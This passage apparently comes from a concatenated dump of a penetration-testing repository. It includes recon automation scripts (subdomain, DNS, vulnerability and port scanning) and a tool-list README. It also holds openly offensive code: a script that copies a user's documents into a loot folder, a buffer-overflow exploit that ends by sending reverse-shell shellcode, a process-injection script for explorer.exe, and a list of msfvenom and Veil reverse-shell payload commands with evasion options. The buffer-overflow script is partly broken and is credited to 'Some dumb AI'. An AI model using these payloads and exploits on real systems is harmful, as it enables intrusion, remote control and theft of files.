-w $WORKING_DIR/puredns.txt 83 | 84 | # Combine DNS results 85 | cat $WORKING_DIR/dnsx.txt $WORKING_DIR/massdns.txt $WORKING_DIR/puredns.txt | sort -u >> $DNS_ANALYSIS_FILE 86 | 87 | # Web Endpoint Enumeration 88 | echo "Starting Web Endpoint Enumeration..." 89 | httpx -l $SUBDOMAINS_FILE -silent -threads 100 -o $WEB_ENDPOINTS_FILE 90 | meg -l $SUBDOMAINS_FILE -p /paths.txt -o $WORKING_DIR/out 91 | hakrawler -url $TARGET_DOMAIN | tee -a $WEB_ENDPOINTS_FILE 92 | waybackurls $TARGET_DOMAIN | tee -a $WEB_ENDPOINTS_FILE 93 | gau $TARGET_DOMAIN | tee -a $WEB_ENDPOINTS_FILE 94 | waymore $TARGET_DOMAIN | tee -a $WEB_ENDPOINTS_FILE 95 | 96 | # Data Cleaning and Management 97 | echo "Cleaning and Managing Data..." 98 | cat $WEB_ENDPOINTS_FILE | anew -q $WORKING_DIR/unique_web_endpoints.txt 99 | 100 | # Vulnerability and Exposure Scanning 101 | echo "Identifying Vulnerabilities..." 
102 | nuclei -l $WORKING_DIR/unique_web_endpoints.txt -o $WORKING_DIR/nuclei_out.txt 103 | dalfox file $WORKING_DIR/unique_web_endpoints.txt -o $WORKING_DIR/dalfox_out.txt 104 | sqlmap -m $WORKING_DIR/unique_web_endpoints.txt --batch --output-dir=$WORKING_DIR/sqlmap_out 105 | 106 | # Append vulnerabilities to the report 107 | cat $WORKING_DIR/nuclei_out.txt $WORKING_DIR/dalfox_out.txt $WORKING_DIR/sqlmap_out/* > $VULNERABILITY_FILE 108 | 109 | # Port Scanning and Enumeration 110 | echo "Starting Port Scanning and Enumeration..." 111 | naabu -iL $SUBDOMAINS_FILE -o $WORKING_DIR/naabu_out.txt 112 | RustScan -a $TARGET_DOMAIN -u 5000 -- -A -sV -oN $WORKING_DIR/rustscan_out.txt 113 | 114 | # Append port enumeration results 115 | cat $WORKING_DIR/naabu_out.txt $WORKING_DIR/rustscan_out.txt > $PORT_ENUM_FILE 116 | 117 | # Compiling Final Report 118 | echo "Compiling Final Report..." 119 | cat $SUBDOMAINS_FILE $DNS_ANALYSIS_FILE $WEB_ENDPOINTS_FILE $VULNERABILITY_FILE $PORT_ENUM_FILE > $FINAL_REPORT 120 | 121 | # Notify via Discord 122 | notify_discord "Scanning and Analysis Completed for $TARGET_DOMAIN. Check the final report in $WORKING_DIR." 123 | 124 | echo "Workflow Completed. Check $FINAL_REPORT for details." 125 | -------------------------------------------------------------------------------- /scripts/automation/DomainWatchdog.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Check if the correct number of arguments are provided 4 | if [ "$#" -ne 2 ]; then 5 | echo "Usage: $0 domain output_file" 6 | exit 1 7 | fi 8 | 9 | # Assign the arguments to variables 10 | domain=$1 11 | output_file=$2 12 | 13 | # Define the wordlist file 14 | wordlist="directory-list-2.3-medium.txt" 15 | 16 | # Check if dig, ffuf, and wget are installed 17 | for tool in dig ffuf wget; do 18 | if ! command -v $tool &> /dev/null; then 19 | echo "$tool is required but not installed. Please install it first." 
20 | exit 1 21 | fi 22 | done 23 | 24 | # Check if the wordlist file exists 25 | if [ ! -f $wordlist ]; then 26 | # If the wordlist file does not exist, download it from the SecLists GitHub repository 27 | echo "Downloading wordlist..." 28 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/$wordlist 29 | fi 30 | 31 | # Fetch the current DNS records of the domain 32 | current_dns_records=$(dig $domain ANY +noall +answer) 33 | 34 | # Check if the output file exists 35 | if [ ! -f $output_file ]; then 36 | # If the output file does not exist, create it and write the current DNS records to it 37 | echo "$current_dns_records" > $output_file 38 | else 39 | # If the output file exists, read the previous DNS records from it 40 | previous_dns_records=$(cat $output_file) 41 | 42 | # Compare the current DNS records with the previous ones 43 | if [ "$current_dns_records" != "$previous_dns_records" ]; then 44 | # If the DNS records have changed, log the changes and send an alert 45 | echo "DNS records for $domain have changed:" 46 | echo "Previous DNS records:" 47 | echo "$previous_dns_records" 48 | echo "Current DNS records:" 49 | echo "$current_dns_records" 50 | 51 | # Update the output file with the current DNS records 52 | echo "$current_dns_records" > $output_file 53 | fi 54 | fi 55 | 56 | # Run ffuf to fuzz the directories of the domain 57 | echo "Running directory fuzzing on $domain..." 
58 | ffuf -w $wordlist -u http://$domain/FUZZ -mc 200,204,301,302,307,401,403 -o new_directories.json -of json 59 | 60 | # Check if any new directories were found 61 | new_directories=$(jq -r '.results[] | .url' new_directories.json) 62 | 63 | if [ -n "$new_directories" ]; then 64 | # If new directories were found, log them and send an alert 65 | echo "New directories found on $domain:" 66 | echo "$new_directories" 67 | fi 68 | -------------------------------------------------------------------------------- /scripts/automation/SubsToNotion.py: -------------------------------------------------------------------------------- 1 | # Title: SubToNotion - Automated Subdomain Recon 2 | # Config: Add your target domain and url to the script. 3 | # Date: 17 April 2023 4 | # Setting up Notion: 5 | # Create a new database with two properties: 6 | # 1. "URL" - property type: "URL" 7 | # 2. "Date Discovered" - property type: "Date" 8 | 9 | import os 10 | import subprocess 11 | import time 12 | from notion_client import Client 13 | from datetime import datetime 14 | 15 | # Initialize Notion client 16 | notion = Client(auth=os.environ["NOTION_API_KEY"]) 17 | 18 | # Replace with your database's URL property name and Notion page URL 19 | database_url_property_name = "URL" 20 | notion_database_url = "NOTION_DATABASE_URL" 21 | 22 | # Functions to interact with Notion 23 | def query_database(database_id): 24 | existing_records = {} 25 | results = notion.databases.query({"database_id": database_id}).get("results") 26 | for result in results: 27 | existing_records[result.properties[database_url_property_name].url] = result 28 | return existing_records 29 | 30 | def add_to_database(database_id, url): 31 | new_page = { 32 | "URL": {"url": url}, 33 | "Date Discovered": {"date": {"start": datetime.now().isoformat()}} 34 | } 35 | notion.pages.create(parent={"database_id": database_id}, properties=new_page) 36 | 37 | def api_request_with_retry(func, *args, **kwargs): 38 | max_retries = 5 39 | 
retry_delay = 10 40 | for i in range(max_retries): 41 | try: 42 | return func(*args, **kwargs) 43 | except Exception as e: 44 | if "API rate limit exceeded" in str(e) and i < max_retries - 1: 45 | time.sleep(retry_delay) 46 | else: 47 | raise e 48 | 49 | # Get the database_id 50 | database_id = api_request_with_retry(notion.databases.retrieve, notion_database_url)["id"] 51 | 52 | # Get existing subdomains from the database 53 | existing_records = api_request_with_retry(query_database, database_id) 54 | 55 | # Save existing subdomains in a temporary file to use as a blacklist 56 | with open("blacklist.txt", "w") as blacklist_file: 57 | for subdomain in existing_records: 58 | blacklist_file.write(subdomain + "\n") 59 | 60 | # Call Amass and Assetfinder, and capture the output of subdomains 61 | domain = "example.com" # Replace with your domain 62 | amass_output = subprocess.check_output(["amass", "enum", "-d", domain, "-bl", "blacklist.txt"]).decode().split("\n") 63 | assetfinder_output = subprocess.check_output(["assetfinder", "--subs-only", domain, "--exclude-subs-file", "blacklist.txt"]).decode().split("\n") 64 | 65 | # Sanitize the output to include only domain names 66 | subdomains = set([s for s in amass_output + assetfinder_output if '.' 
in s]) 67 | 68 | # Remove the temporary blacklist file 69 | os.remove("blacklist.txt") 70 | 71 | # Save new domains to the database if they are not already listed 72 | for subdomain in subdomains: 73 | if subdomain and subdomain not in existing_records: 74 | api_request_with_retry(add_to_database, database_id, subdomain) 75 | 76 | # Set up a cron job that will run this script every hour (outside the script) 77 | # Add the following to crontab, etc: 0 * * * * /path/to/python /path/to/your/script.py 78 | -------------------------------------------------------------------------------- /scripts/automation/SubsToSQL.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sqlite3 3 | import subprocess 4 | import requests 5 | from datetime import datetime 6 | 7 | # Replace with your domain 8 | domain = "example.com" 9 | 10 | # Replace with your webhook URL 11 | webhook_url = "WEBHOOK_URL" 12 | 13 | # Set up SQLite database 14 | conn = sqlite3.connect("subdomains.db") 15 | cursor = conn.cursor() 16 | cursor.execute('''CREATE TABLE IF NOT EXISTS subdomains ( 17 | id INTEGER PRIMARY KEY, 18 | url TEXT NOT NULL UNIQUE, 19 | date_discovered TEXT NOT NULL, 20 | notified INTEGER DEFAULT 0 21 | )''') 22 | conn.commit() 23 | 24 | # Functions to interact with SQLite database 25 | def query_database(): 26 | cursor.execute("SELECT url FROM subdomains") 27 | existing_records = [row[0] for row in cursor.fetchall()] 28 | return existing_records 29 | 30 | def add_to_database(url): 31 | date_discovered = datetime.now().isoformat() 32 | cursor.execute("INSERT INTO subdomains (url, date_discovered) VALUES (?, ?)", (url, date_discovered)) 33 | conn.commit() 34 | 35 | def mark_as_notified(url): 36 | cursor.execute("UPDATE subdomains SET notified = 1 WHERE url = ?", (url,)) 37 | conn.commit() 38 | 39 | # Call webhook function 40 | def call_webhook(subdomain): 41 | try: 42 | response = requests.post(webhook_url, json={"text": f"New subdomain 
found: {subdomain}"}) 43 | response.raise_for_status() 44 | return True 45 | except requests.exceptions.RequestException as e: 46 | print(f"Error calling webhook: {e}") 47 | return False 48 | 49 | # Get existing subdomains from the database 50 | existing_records = query_database() 51 | 52 | # Call Amass and Assetfinder, and capture the output of subdomains 53 | amass_output = subprocess.check_output(["amass", "enum", "-d", domain]).decode().split("\n") 54 | assetfinder_output = subprocess.check_output(["assetfinder", "--subs-only", domain]).decode().split("\n") 55 | 56 | # Sanitize the list of subdomains 57 | subdomains = set(amass_output + assetfinder_output) 58 | 59 | # Save new domains to the database if they are not already listed 60 | for subdomain in subdomains: 61 | if subdomain and subdomain not in existing_records: 62 | add_to_database(subdomain) 63 | 64 | # Call webhook and mark the record as notified if successful 65 | if call_webhook(subdomain): 66 | mark_as_notified(subdomain) 67 | 68 | # Close the database connection 69 | conn.close() 70 | 71 | # Set up a cron job that will run this script every hour (outside the script) 72 | # Add the following to crontab, etc: 73 | # 0 * * * * /path/to/python /path/to/your/script.py 74 | -------------------------------------------------------------------------------- /scripts/automation/TrendyWordlister.py: -------------------------------------------------------------------------------- 1 | """ 2 | Fetch and Append Trending Topics to a Wordlist 3 | """ 4 | 5 | import requests 6 | from bs4 import BeautifulSoup 7 | import subprocess 8 | 9 | def fetch_trending_topics(): 10 | url = "https://en.wikipedia.org/wiki/Wikipedia:Top_25_Report" 11 | response = requests.get(url) 12 | soup = BeautifulSoup(response.content, 'html.parser') 13 | topics = [] 14 | for item in soup.select("h3 + ul")[0].select("li"): 15 | topic = item.get_text(separator=" ", strip=True) 16 | topics.append(topic) 17 | return topics[:10] 18 | 19 | def 
append_topics_to_file_with_anew(topics, file_path): 20 | for topic in topics: 21 | subprocess.run(['anew', file_path], input=topic.encode()) 22 | 23 | file_path = '/mnt/data/trending_topics.txt' 24 | trending_topics = fetch_trending_topics() 25 | append_topics_to_file_with_anew(trending_topics, file_path) 26 | 27 | file_path 28 | -------------------------------------------------------------------------------- /scripts/exfil/lil-doc-snatcher.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Description: A quick exfil for Mac and Linux. 4 | # Exports files to disk and logs filesystem up to 1GB total size. 5 | # Mod file size as needed. 6 | 7 | # Test the ability to copy files. 8 | if ! cp /etc/hosts /dev/null >/dev/null; then 9 | echo "This script requires permission to copy files." >&2 10 | exit 1 11 | fi 12 | 13 | LOOT_DIR="/exfilit" 14 | SUB_DIR="$LOOT_DIR/files" 15 | SRC_DIRS=("$HOME/Documents" "$HOME/Downloads") 16 | SIZE_LIMIT=1000000000 # 1GB in bytes 17 | 18 | # Create the destination directory and its parent directories if they do not exist. 19 | mkdir -p "$SUB_DIR" 20 | 21 | # Update the access time of the output files without modifying their contents. 22 | touch -a "$LOOT_DIR"/{large_files,folders}.txt 23 | 24 | # Loop through all files in the source directories and copy them to the destination directory, 25 | # up to the size limit. 26 | total_size=0 27 | while [ $total_size -lt $SIZE_LIMIT ]; do 28 | file=$(find "${SRC_DIRS[@]}" -type f -size +1M -print -quit) 29 | if [ -z "$file" ]; then 30 | break 31 | fi 32 | size=$(stat -c%s "$file") 33 | if [ $((total_size + size)) -gt $SIZE_LIMIT ]; then 34 | break 35 | fi 36 | cp "$file" "$SUB_DIR" 37 | total_size=$((total_size + size)) 38 | done 39 | 40 | # Append the names of all directories to the folders.txt file. 
41 | find "${SRC_DIRS[@]}" -type d -print0 | xargs -0 -I {} sh -c 'echo {} >> "$LOOT_DIR/folders.txt"' 42 | -------------------------------------------------------------------------------- /scripts/exploits/buffer_jump.py: -------------------------------------------------------------------------------- 1 | """ 2 | This program tests for buffer overflow vulnerabilities in a target application by sending a string of increasing length 3 | and constructing a payload to exploit the vulnerability. The payload is designed to gain root access to the target system. 4 | The program uses the Mona framework to identify the memory location where the pattern overwrote the buffer, find bad characters, 5 | and determine the right module to target. 6 | 7 | Author: Some dumb AI 8 | """ 9 | 10 | import os 11 | import socket 12 | import sys 13 | import time 14 | 15 | # Prompt user for target IP and port 16 | ip = input("Enter the target IP address: ") 17 | port = input("Enter the target port: ") 18 | 19 | # Create a string of increasing length to send to the application to test for a buffer overflow 20 | buffer = "" 21 | for i in range(100, 5000, 100): 22 | buffer += "A" * i 23 | 24 | # Connect to the target application and send the buffer 25 | try: 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect((ip, int(port))) 28 | print(f"Sending {len(buffer)} bytes...") 29 | s.send(buffer.encode()) 30 | s.close() 31 | print("Buffer sent successfully. Check the application to see if it crashed.") 32 | except: 33 | print("Error connecting to server.") 34 | sys.exit() 35 | 36 | # If the application has crashed, use Mona to identify the memory location where the pattern overwrote the buffer. 37 | # Use the identified offset to construct the payload that will exploit the vulnerability. 38 | if input("Did the application crash? 
(Y/N) ").upper() == "Y": 39 | try: 40 | # Generate a unique pattern using Mona 41 | os.system("mona pattern_create 5000 > pattern.txt") 42 | 43 | # Send the pattern to the application 44 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 45 | s.connect((ip, int(port))) 46 | with open("pattern.txt", "r") as f: 47 | pattern = f.read() 48 | print(f"Sending {len(pattern)} bytes...") 49 | s.send(pattern.encode()) 50 | s.close() 51 | print("Pattern sent successfully. Check the application to see where the pattern overwrote the buffer.") 52 | except: 53 | print("Error connecting to server.") 54 | sys.exit() 55 | 56 | # Get the offset where the pattern overwrote the buffer 57 | offset = input("Enter the value of EIP (eg. 41396f41): ") 58 | try: 59 | os.system(f"mona findmsp -distance 5000 -pattern {offset} -n") 60 | except: 61 | print("Error running Mona.") 62 | sys.exit() 63 | 64 | # Use Mona to find bad characters 65 | try: 66 | os.system("mona bytearray -cpb \"\\x00\"") 67 | os.system("mona compare -f bytearray.bin -a -o badchars.txt") 68 | except: 69 | print("Error running Mona.") 70 | sys.exit() 71 | 72 | # Use Mona to find the right module 73 | try: 74 | os.system("mona modules") 75 | os.system("mona jmp -r esp -m ") 76 | except: 77 | print("Error running Mona.") 78 | sys.exit() 79 | 80 | # Generate the final payload and send it to the application to gain root access 81 | try: 82 | os.system(f"msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b \"\\x00\" -f python -v shellcode") 83 | with open("shellcode", "r") as f: 84 | shellcode = f.read() 85 | encoded_shellcode = shellcode.encode("latin-1").hex() 86 | buffer = "A" * 2003 + "B" * 4 + encoded_shellcode 87 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 88 | s.connect((ip, int(port))) 89 | print(f"Sending {len(buffer)} bytes...") 90 | s.send(buffer.encode()) 91 | s.close() 92 | print("Payload sent successfully. 
Check the listener to see if you have gained root access.") 93 | except: 94 | print("Error connecting to server 95 | -------------------------------------------------------------------------------- /scripts/exploits/python-injection-example.sh: -------------------------------------------------------------------------------- 1 | #First, we need to create a payload using the Metasploit Framework. We can use the following command to generate a simple Windows reverse shell payload in raw format: 2 | 3 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f raw -o payload.raw 4 | 5 | #Next, we need to create a Python script that will inject the payload into explorer.exe. Here's an example: 6 | 7 | import struct 8 | import ctypes 9 | 10 | # Replace with your own payload file name 11 | filename = "payload.raw" 12 | 13 | # Open the payload file and read its contents 14 | with open(filename, "rb") as f: 15 | payload = f.read() 16 | 17 | # Convert the memory address of the explorer.exe process to an integer 18 | explorer_addr = 0x{insert explorer.exe address here} 19 | 20 | # Open the process using the obtained address 21 | process = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, explorer_addr) 22 | 23 | # Allocate memory in the explorer.exe process for the payload 24 | address = ctypes.windll.kernel32.VirtualAllocEx(process, 0, len(payload), 0x1000, 0x40) 25 | 26 | # Write the payload to the allocated memory 27 | written = ctypes.c_ulong(0) 28 | ctypes.windll.kernel32.WriteProcessMemory(process, address, payload, len(payload), ctypes.byref(written)) 29 | 30 | # Create a new thread in the explorer.exe process that will execute the payload 31 | thread_id = ctypes.c_ulong(0) 32 | kernel32 = ctypes.windll.kernel32 33 | start_addr = address 34 | hThread = kernel32.CreateRemoteThread(process, None, 0, start_addr, None, 0, ctypes.byref(thread_id)) 35 | 36 | print(f"Injected payload into explorer.exe with thread ID {thread_id}") 37 | 
-------------------------------------------------------------------------------- /scripts/exploits/veil-venom-shells.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | # MSVenom payloads 4 | 5 | # Windows Reverse TCP Meterpreter 6 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o reverse_meterpreter.exe 7 | 8 | # Linux Reverse TCP Meterpreter 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o reverse_meterpreter.elf 10 | 11 | # macOS Reverse TCP Meterpreter 12 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho -o reverse_shell.macho 13 | 14 | # Android Reverse TCP Meterpreter 15 | msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o reverse_meterpreter.apk 16 | 17 | # PHP Reverse TCP Meterpreter 18 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw -o reverse_shell.php 19 | 20 | # Generate a Windows x86 reverse shell payload in the Powershell format 21 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f powershell -o reverse_shell.ps1 22 | 23 | # Generate a Linux x86 bind shell payload in the Python format 24 | msfvenom -p linux/x86/shell/bind_tcp LPORT= -f python -o bind_shell.py 25 | 26 | # Generate a macOS x86 reverse TCP Meterpreter payload that connects through an HTTP proxy 27 | msfvenom -p osx/x86/meterpreter/reverse_tcp LHOST= LPORT= -f macho -o reverse_meterpreter.macho HTTP_PROXY=http://proxy.example.com:8080 28 | 29 | # Generate a Windows x64 reverse HTTPS Meterpreter payload that encrypts communications with RC4 30 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= -f exe -o reverse_meterpreter.exe ENCODING=rc4 31 | 32 | 33 | # Veil payloads 34 | 35 | # Generate a custom payload with a specific name and set of evasion techniques 36 | python Veil.py -p python/meterpreter/rev_http -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -H 5' 37 | 38 | # Generate a payload with a custom shellcode encoder 39 | python 
Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-x alpha_mixed' 40 | 41 | # Generate a payload with custom obfuscation options 42 | python Veil.py -p python/meterpreter/reverse_tcp -o my_payload -t python -c '-t PS -Obfuscate true -ObfuscationType 3 -OutDirectory /root/veil/payloads/obfuscated' 43 | 44 | # Generate a payload with an encrypted communication channel 45 | python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -C :' 46 | -------------------------------------------------------------------------------- /scripts/foothold-to-escalation/Readme.md: -------------------------------------------------------------------------------- 1 | # Toolbox 2 | 1. [Windows Toolkit](#1-wintools) 3 | 2. [Mixed Bag](#2-escalatemytools) 4 | --- 5 | 6 | ## 1. `winTools` 7 | 8 | ### **Usage** 9 | Run either of the following commands (using `wget` or `curl`) to fetch the script, then execute it to clone every tool listed below into a `tools` directory. Read the script before running it: it performs a `git clone --depth 1` of each repository at its current HEAD with no commit pinning or signature verification and downloads two zip archives, so what you end up with is whatever those upstreams serve at that moment. Run it only on a dedicated, isolated testing host, never on a production or personal machine. 10 | 11 | ```bash 12 | wget -O wintools.sh https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/refs/heads/main/scripts/foothold-to-escalation/winTools.sh && chmod +x wintools.sh && ./wintools.sh 13 | ``` 14 | 15 | ```bash 16 | curl -L -o wintools.sh https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/refs/heads/main/scripts/foothold-to-escalation/winTools.sh && chmod +x wintools.sh && ./wintools.sh 17 | ``` 18 | 19 | ### **Active Directory & Privilege Escalation Tools** 20 | - [ADACLScanner](https://github.com/canix1/ADACLScanner) - Reports DACLs/SACLs on Active Directory objects (this is the canix1 repository `winTools.sh` actually clones; the earlier "ADelegator" entry did not match the script) 21 | - [ScriptSentry](https://github.com/techspence/ScriptSentry) - Finds misconfigured and dangerous logon scripts (link corrected to the repository `winTools.sh` clones) 22 | - [PingCastle](https://github.com/vletoux/pingcastle) - Active Directory security health check 23 | - [Locksmith](https://github.com/jakehildreth/Locksmith) - Finds and remediates common Active Directory Certificate Services (AD CS) misconfigurations (link corrected to the repository `winTools.sh` clones) 24 | - [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) - AD reconnaissance
tool (PowerView); `winTools.sh` symlinks `tools/PowerView` to this `Recon` directory. PowerSploit is archived and unmaintained, so review it before use and expect AV to flag it 25 | - [PowerSharpPack](https://github.com/S3cur3Th1sSh1t/PowerSharpPack) - PowerShell wrappers around compiled C# offensive tools; the assemblies are embedded pre-built, so the code you execute is not the code you can read — build from source if that matters for your engagement 26 | - [PrivescCheck](https://github.com/itm4n/PrivescCheck) - Windows privilege escalation checker 27 | - [NetTools](https://github.com/Wh1t3Rh1n0/Net-Tools) - Windows networking tools for enumeration (not cloned by `winTools.sh`; fetch it manually) 28 | 29 | ### **Certificate & NTLM Tools** 30 | - [Certipy](https://github.com/ly4k/Certipy) - Toolkit for Active Directory Certificate Services (AD CS) enumeration and abuse 31 | - [Responder](https://github.com/SpiderLabs/Responder) - LLMNR, NBT-NS, and mDNS poisoner (`winTools.sh` clones the original SpiderLabs repository; the actively maintained fork is lgandx/Responder) 32 | - [Impacket](https://github.com/SecureAuthCorp/impacket) - Python toolkit for working with network protocols (the project now lives at fortra/impacket; the old URL redirects there) 33 | - [Kerbrute](https://github.com/ropnop/kerbrute) - Kerberos pre-authentication user enumeration and password spraying (the previous "Kerbute"/cube0x0 link did not match the repository `winTools.sh` clones — a mistyped repository name is exactly what typosquatters rely on, so check links against the script) 34 | 35 | ### **Recon & AD Enumeration** 36 | - [Maester](https://github.com/maester365/maester) - Microsoft 365 / Entra ID security configuration test framework (PowerShell/Pester); link corrected to the repository `winTools.sh` clones 37 | - [Msftrecon](https://github.com/0x4D31/msftrecon) - Microsoft-focused reconnaissance framework (not cloned by `winTools.sh`; fetch it manually) 38 | - [TSS Data Collection Scripts](https://aka.ms/getTSS) - Microsoft TroubleShootingScript (TSS) support data-collection toolset; `winTools.sh` downloads it from this link as `TSS/TSS.zip` 39 | - [adidnsdump](https://github.com/dirkjanm/adidnsdump) - Extracts DNS records from Active Directory-integrated DNS (`winTools.sh` clones it into a directory named `ADMiner`) - [ROADtools](https://github.com/dirkjanm/ROADtools) - Azure AD / Entra ID enumeration framework (cloned by `winTools.sh`) - [BloodHound](https://github.com/BloodHoundAD/BloodHound) - Active Directory attack-path graphing (cloned by `winTools.sh`) 40 | 41 | ### **Credential & Network Tools** 42 | - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - Post-exploitation tool for AD. The project is archived; its maintained successor is NetExec, which `escalateMyTools.py` can install with `--install-netexec` 43 | 44 | ### **Microsoft Sysinternals Tool** 45 | - [ADExplorer](https://download.sysinternals.com/files/ADExplorer.zip) - Microsoft Sysinternals AD object viewer; `winTools.sh` only downloads the zip, so after extracting verify the Authenticode signature on `ADExplorer.exe` before running it 46 | --- 47 | 48 | ## 2. `escalateMyTools` 49 | 50 | Granular tool installation script. Windows and Linux.
51 | > Note: like `winTools.sh`, this script pulls most of its tools from moving `master`/`latest` URLs (only `pspy64` below is pinned to a release), so read it first, run it on an isolated testing host and record the commit hashes you actually tested with. 52 | - Using curl: 53 | ```sh 54 | curl -sSL https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/main/scripts/foothold-to-escalation/escalateMyTools.py -o escalateMyTools.py && chmod +x escalateMyTools.py && ./escalateMyTools.py --interactive 55 | ``` 56 | 57 | - Using wget: 58 | ```sh 59 | wget https://raw.githubusercontent.com/Root-Down-Digital/pentesting-resources/main/scripts/foothold-to-escalation/escalateMyTools.py -O escalateMyTools.py && chmod +x escalateMyTools.py && ./escalateMyTools.py --interactive 60 | ``` 61 | 62 | ### Options 63 | ``` 64 | Do you want to run the script with any of the following flags? 65 | 1. --cleanup 66 | 2. --install-pspy 67 | 3. --install-netexec 68 | 4. --install-impacket 69 | 5. --install-both (pspy and NetExec) 70 | 6. No flags 71 | Enter the number corresponding to your choice: 72 | ``` 73 | 74 | ## Tool List 75 | 76 | ### CVE-Specific Exploits: 77 | - cve-2016-5195-dirtycow.c (Linux kernel privilege escalation — Dirty COW, a race condition that can leave the target unstable) 78 | - cve-2019-13272-exploit.sh (Linux kernel privilege escalation via ptrace_link / PTRACE_TRACEME) 79 | - cve-2020-3452-exploit.py (Cisco ASA/FTD unauthenticated arbitrary file read) 80 | - cve-2020-1472-exploit.py (Zerologon — Netlogon Elevation of Privilege; the exploit resets the DC machine-account password to empty, which must be restored afterwards or the DC will break) 81 | - cve-2021-3156-exploit.c (Sudo heap-based buffer overflow, "Baron Samedit") 82 | - cve-2021-1675-exploit.py (PrintNightmare — Windows Print Spooler) 83 | - walkingpath.py (CVE-2022-4510 — path traversal in binwalk's PFS extractor; this is not a Google Titan Security Key issue) 84 | - CVE-2017-0213.cpp (Windows COM Elevation of Privilege; C++ source that has to be compiled before use) 85 | Kernel and memory-corruption exploits can crash or corrupt the target — confirm they are in scope and have a rollback plan before running them against anything you do not own. 86 | ### Linux Tools: 87 | - LinEnum.sh (https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) 88 | - linpeas.sh (https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh) 89 | - linux-exploit-suggester.sh (https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh) 90 | - pspy64 (https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64) — the only pinned download in this list; the three above are fetched from `master`/`latest` and can change underneath you 91 | 92 | ### Windows Tools: 93 | - Invoke-PowerShellTcp.ps1
(https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1) 94 | - PowerUp.ps1 (https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1) 95 | - Seatbelt.ps1 (https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Seatbelt.exe) — note: the URL is the pre-compiled `Seatbelt.exe` .NET binary, not a PowerShell script; save and run it as an `.exe`, and verify the build before executing it 96 | - Invoke-SharpUp.ps1 (https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1) 97 | - winPEAS.ps1 (https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1) 98 | - Windows-Exploit-Suggester.py (https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py) — Python 2 script; needs the `xlrd` module and a bulletin database fetched with `--update` 99 | - LaZagne.py (https://raw.githubusercontent.com/AlessandroZ/LaZagne/master/Windows/laZagne.py) — this single file is only the launcher and imports the `lazagne` package from the repository, so clone the whole repo (or use a release build) rather than fetching this file alone 100 | - CVE-2017-0213.cpp (https://github.com/SecWiki/windows-kernel-exploits/blob/master/CVE-2017-0213/CVE-2017-0213.cpp) — this is a `/blob/` page URL; downloading it saves GitHub's HTML, not the source. Use the raw file instead: https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/CVE-2017-0213/CVE-2017-0213.cpp 101 | 102 | ## General Tools 103 | - log4j-scan.py (https://raw.githubusercontent.com/fullhunt/log4j-scan/master/log4j-scan.py) 104 | - mcafee_sitelist_pwd_decrypt.py (https://raw.githubusercontent.com/funoverip/mcafee-sitelist-pwd-decryption/master/mcafee_sitelist_pwd_decrypt.py) 105 | - pentestmonkey-php-reverse-shell.php (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) 106 | 107 | 108 | _Credit to all the tool authors; if a credit is missing, contact us directly._ 109 | -------------------------------------------------------------------------------- /scripts/foothold-to-escalation/traverserHunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | This script performs a directory traversal attack on a target URL specified by the user. 4 | It prompts the user for the target URL, validates the input, and performs the attack using 5 | a specified number of traversal levels.
